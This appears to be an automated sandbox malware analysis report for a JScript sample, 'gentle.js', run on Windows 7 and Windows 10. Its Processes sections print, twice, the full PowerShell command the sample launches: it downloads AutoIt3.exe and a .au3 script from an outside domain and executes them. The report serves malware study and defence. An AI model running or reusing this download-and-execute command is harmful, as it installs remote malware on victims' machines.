Malware Analysis Report

2024-11-30 11:16

Sample ID 231101-z96j7sdc7x
Target gentle.js
SHA256 4dce8991fb2942cb8443aba697311072aa25fc61b4b4186a54e7956c2bec6799
Tags
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

4dce8991fb2942cb8443aba697311072aa25fc61b4b4186a54e7956c2bec6799

Threat Level: Shows suspicious behavior

The file gentle.js was found to be: Shows suspicious behavior.

Malicious Activity Summary


Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-01 21:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-01 21:26

Reported

2023-11-01 21:29

Platform

win7-20231023-en

Max time kernel

118s

Max time network

122s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"

Network

N/A

Files

memory/3040-4-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/3040-5-0x0000000002290000-0x0000000002298000-memory.dmp

memory/3040-6-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

memory/3040-7-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

memory/3040-8-0x00000000026F0000-0x0000000002770000-memory.dmp

memory/3040-10-0x00000000026F0000-0x0000000002770000-memory.dmp

memory/3040-9-0x00000000026F0000-0x0000000002770000-memory.dmp

memory/3040-11-0x00000000026F0000-0x0000000002770000-memory.dmp

memory/3040-12-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-01 21:26

Reported

2023-11-01 21:29

Platform

win10v2004-20231023-en

Max time kernel

11s

Max time network

22s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4328 wrote to memory of 4716 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4328 wrote to memory of 4716 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\gentle.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp

Files

N/A